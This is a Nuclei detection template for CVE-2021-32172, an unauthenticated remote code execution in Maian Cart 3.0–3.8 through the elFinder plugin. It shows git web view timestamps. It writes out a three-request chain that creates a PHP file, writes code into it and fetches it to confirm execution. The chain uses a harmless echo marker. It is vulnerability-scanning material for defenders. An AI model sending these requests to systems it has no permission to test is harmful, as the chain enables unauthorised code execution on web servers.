nuclei-templates/http/cves/2021/CVE-2021-32172.yaml

64 lines
2.1 KiB
YAML
Raw Normal View History

id: CVE-2021-32172
info:
name: Maian Cart <=3.8 - Remote Code Execution
author: pdteam
severity: critical
description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability.
reference:
- https://dreyand.github.io/maian-cart-rce/
- https://github.com/DreyAnd/maian-cart-rce
- https://www.maianscriptworld.co.uk/critical-updates
- https://nvd.nist.gov/vuln/detail/CVE-2021-32172
2023-07-11 19:49:27 +00:00
- https://www.maianscriptworld.co.uk/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-32172
cwe-id: CWE-862
2023-10-14 11:27:55 +00:00
epss-score: 0.26193
epss-percentile: 0.96182
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*
metadata:
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: maianscriptworld
product: maian_cart
tags: cve,cve2021,rce,unauth,maian,intrusive
http:
- raw:
- |
GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
- |
GET /product-downloads/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
2023-07-11 19:49:27 +00:00
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_3, "{{randstr_1}}")
- status_code_3 == 200
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
2023-07-11 19:49:27 +00:00
internal: true
# digest: 4a0a00473045022012ed4898e86ca58a60de4ee2a1fb97ad5cb32b65fe980100895805198d55335b022100e523564c50ad0c173a28b3969e2fcced128716f77107e6f98d021031c9ceb7b2:922c64590222798bb761d5b6d8e72950